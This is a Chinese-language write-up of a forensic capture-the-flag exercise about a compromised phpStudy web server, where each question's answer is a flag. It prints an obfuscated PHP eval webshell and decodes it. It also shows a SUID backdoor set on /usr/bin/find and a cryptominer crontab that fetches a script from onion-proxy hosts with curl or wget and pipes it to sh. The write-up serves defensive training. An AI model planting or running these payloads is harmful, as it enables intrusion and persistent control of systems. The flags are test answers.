# 题目 1
黑客的 IP 是? flag 格式:flag {黑客的 ip 地址},如:flag {127.0.0.1}
日志的位置变了,是个 phpstudy 的网站?
直接 www 目录搜索 *.log
的文件,找到了日志
直接统计 IP 数,多的必是扫描器
[root@ip-10-0-10-4 ~]# cat /www/admin/websec_80/log/nginx_access_2023-12-2* | cut -d" " | |
-f1 | sort | uniq -c | |
1 | |
107 192.168.10.1 | |
287734 192.168.10.135 |
flag: flag{192.168.10.135}
# 题目 2
黑客攻陷网站的具体时间是? flag 格式:flag {年 - 月 - 日 时:分: 秒},如:flag {2023-12-24 22:23:24}
web 端口 8081, admin/12345678
登录进去找到留下的用户和登录时间
我从日志文件的 302 跳转其实已经发现了时间,但是有几秒差距。
flag 是以后台的时间为准
flag: flag{2023-12-22 19:08:34}
# 题目 3
黑客上传 webshell 的名称及密码是? flag 格式:flag {黑客上传的 webshell 名称 - webshell 密码},如:flag {webshell.php-pass}
下载下来直接火绒告警
[root@ip-10-0-10-4 ~]# cat /www/admin/websec_80/wwwroot/error/404.php | |
<?php | |
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA=='))); |
解密一下
<?php | |
$decoded_string = base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA=='); | |
$uncompressed_string = gzuncompress($decoded_string); | |
echo $uncompressed_string; | |
?> |
[root@ip-10-0-10-4 ~]# php decrypt.php | |
eval($_POST['cmd']); |
flag: flag{404.php-cmd}
# 题目 4
黑客提权后设置的后门文件名称是? flag 格式:flag {后门文件绝对路径加上名称},如:flag {/etc/passwd}
[root@ip-10-0-10-1 ~]# history | |
1 ip addr | |
2 rpm -qa|grep vim | |
3 vim | |
4 yum -y install vim* | |
5 vim | |
6 yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh | |
7 vim /etc/hosts | |
8 ls | |
9 cd /var/www/ | |
10 cd /tmp | |
11 vim config.sh | |
12 chmod +x config.sh | |
13 ll | |
14 sh config.sh | |
15 history | |
16 ls | |
17 ifconfig | |
18 ip addr | |
19 ll | |
20 chmod 4775 /usr/bin/find | |
21 w | |
22 cat /etc/passwd | |
23 ip addr | |
24 w |
看到历史记录中给 find 加了 suid 权限了
flag: flag{/usr/bin/find}
# 题目 5
对黑客上传的挖矿病毒进行分析,获取隐藏的 Flag
挖矿一般会计划任务启动,查看计划任务,看到写的内容了
[root@ip-10-0-10-4 ~]# cat /etc/crontab | |
SHELL=/bin/bash | |
PATH=/sbin:/bin:/usr/sbin:/usr/bin | |
MAILTO=root | |
# For details see man 4 crontabs | |
# Example of job definition: | |
# .---------------- minute (0 - 59) | |
# | .------------- hour (0 - 23) | |
# | | .---------- day of month (1 - 31) | |
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ... | |
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat | |
# | | | | | | |
# * * * * * user-name command to be executed | |
*/7 * * * * root R=$(shuf -i 1-29 -n 1); | |
sleep ${R:-0}; | |
BP=$(dirname "$(command -v yes)"); | |
BP=${BP:-"/usr/bin"};G1="curl"; | |
if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then | |
G1="echo";for f in ${BP}/*; | |
do | |
strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break; | |
done; | |
fi; | |
G2="wget"; | |
if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then | |
G2="echo"; | |
for f in ${BP}/*; | |
do | |
strings $f 2>/dev/null|grep -q "to <[email protected]>" && G2="$f" && break; | |
done; | |
fi; | |
if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then | |
echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; | |
fi; | |
C=" -fsSLk --connect-timeout 26 --max-time 75 "; | |
W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 "; | |
H="https://an7kmd2wp4xo7hpr"; | |
T1=".tor2web.su/"; | |
T2=".d2web.org/"; | |
T3=".onion.sh/"; | |
P="src/ldm"; | |
($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh & |
我拼接了一下
curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm||curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm||curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm||wget --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm |
看到了 ldm
文件,查找一下
[root@ip-10-0-10-1 tmp]# find / -name "ldm" 2>/dev/null | |
/etc/.cache/ldm | |
[root@ip-10-0-10-1 tmp]# file /etc/.cache/ldm | |
/etc/.cache/ldm: Bourne-Again shell script, ASCII text executable, with very long lines |
可以直接查看,眼睛看瞎之后看到这个
nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1 |
解一下
[root@ip-10-0-10-1 tmp]# echo "aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk=" | base64 -d | |
import time | |
while 1: | |
print("flag{websec_True@888!}") | |
time.sleep(1000) |
拿到 flag
flag: flag{websec_True@888!}